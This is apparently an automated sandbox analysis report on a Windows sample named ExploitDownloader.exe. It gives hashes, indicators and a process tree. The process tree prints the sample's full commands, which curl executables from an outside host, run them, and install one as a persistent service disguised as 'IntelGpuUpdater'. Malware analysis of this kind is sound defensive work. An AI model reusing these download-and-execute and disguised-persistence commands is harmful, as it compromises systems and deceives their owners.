Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
01-12-2024 20:45
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
ExploitDownloader.exe
Resource
win7-20241010-en
windows7-x64
3 signatures
150 seconds
General
-
Target
ExploitDownloader.exe
-
Size
27KB
-
MD5
d363863c21f0d453eaaa438f00027554
-
SHA1
7ba078266d3151068b500b9ce8cc4e579ad84a4a
-
SHA256
12eafe77459f406a8187cb7675249dfed1b214f47eff60d1291b42ed00c576e4
-
SHA512
1ff53e7a3f6eee3b99111a79bded3106fb809bd494b23839a5790a78f8b6baedbfaa707a16ceda481f93edde4d9b8bae06f12c444e16f7def5ce06f297f2bc37
-
SSDEEP
384:SsuozKPc0cDxRHXLRq418p/d6tVqQ4m9lHM1UopuJE5UjovhObRZUbjMUWDBVhIB:TLLIXTEs1Urjov4RScUWD7hq7W2e0W0
Score
4/10
Malware Config
Signatures
-
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\IntelGpuUpdater.exe cmd.exe -
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ExploitDownloader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2804 wrote to memory of 2892 2804 ExploitDownloader.exe 31 PID 2804 wrote to memory of 2892 2804 ExploitDownloader.exe 31 PID 2804 wrote to memory of 2892 2804 ExploitDownloader.exe 31 PID 2804 wrote to memory of 2892 2804 ExploitDownloader.exe 31 PID 2892 wrote to memory of 2808 2892 cmd.exe 32 PID 2892 wrote to memory of 2808 2892 cmd.exe 32 PID 2892 wrote to memory of 2808 2892 cmd.exe 32 PID 2892 wrote to memory of 2808 2892 cmd.exe 32 PID 2804 wrote to memory of 2768 2804 ExploitDownloader.exe 33 PID 2804 wrote to memory of 2768 2804 ExploitDownloader.exe 33 PID 2804 wrote to memory of 2768 2804 ExploitDownloader.exe 33 PID 2804 wrote to memory of 2768 2804 ExploitDownloader.exe 33 PID 2768 wrote to memory of 2740 2768 cmd.exe 34 PID 2768 wrote to memory of 2740 2768 cmd.exe 34 PID 2768 wrote to memory of 2740 2768 cmd.exe 34 PID 2768 wrote to memory of 2740 2768 cmd.exe 34 PID 2804 wrote to memory of 2744 2804 ExploitDownloader.exe 35 PID 2804 wrote to memory of 2744 2804 ExploitDownloader.exe 35 PID 2804 wrote to memory of 2744 2804 ExploitDownloader.exe 35 PID 2804 wrote to memory of 2744 2804 ExploitDownloader.exe 35 PID 2744 wrote to memory of 2616 2744 cmd.exe 36 PID 2744 wrote to memory of 2616 2744 cmd.exe 36 PID 2744 wrote to memory of 2616 2744 cmd.exe 36 PID 2744 wrote to memory of 2616 2744 cmd.exe 36 PID 2804 wrote to memory of 2484 2804 ExploitDownloader.exe 37 PID 2804 wrote to memory of 2484 2804 ExploitDownloader.exe 37 PID 2804 wrote to memory of 2484 2804 ExploitDownloader.exe 37 PID 2804 wrote to memory of 2484 2804 ExploitDownloader.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\ExploitDownloader.exe"C:\Users\Admin\AppData\Local\Temp\ExploitDownloader.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2892 -
C:\Windows\SysWOW64\cmd.execmd /c "cmd /c sc delete IntelGpuUpdater && cmd /c sc stop IntelGpuUpdater && "3⤵
- System Location Discovery: System Language Discovery
PID:2808
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "curl https://dontuseme.ct8.pl/test.exe > %localappdata%\test.exe && start %localappdata%\test.exe && timeout 5 && del %localappdata%\test.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SysWOW64\cmd.execmd /c "curl https://dontuseme.ct8.pl/test.exe > C:\Users\Admin\AppData\Local\test.exe && start C:\Users\Admin\AppData\Local\test.exe && timeout 5 && del C:\Users\Admin\AppData\Local\test.exe"3⤵
- System Location Discovery: System Language Discovery
PID:2740
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\cmd.execmd /c "del C:\Windows\IntelGpuUpdater.exe && del C:\Windows\IntelGpuUpdaterHelper.exe && curl https://dontuseme.ct8.pl/test.exe > C:\Windows\IntelGpuUpdater.exe && curl https://dontuseme.ct8.pl/nssm.exe > C:\Windows\IntelGpuUpdaterHelper.exe && C:\Windows\IntelGpuUpdaterHelper.exe install IntelGpuUpdater C:\Windows\IntelGpuUpdater.exe && cmd /c sc start IntelGpuUpdater && cmd /c sc failure IntelGpuUpdater reset= 0 actions= restart/5000/restart/5000/restart/5000"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2616
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c pause2⤵
- System Location Discovery: System Language Discovery
PID:2484
-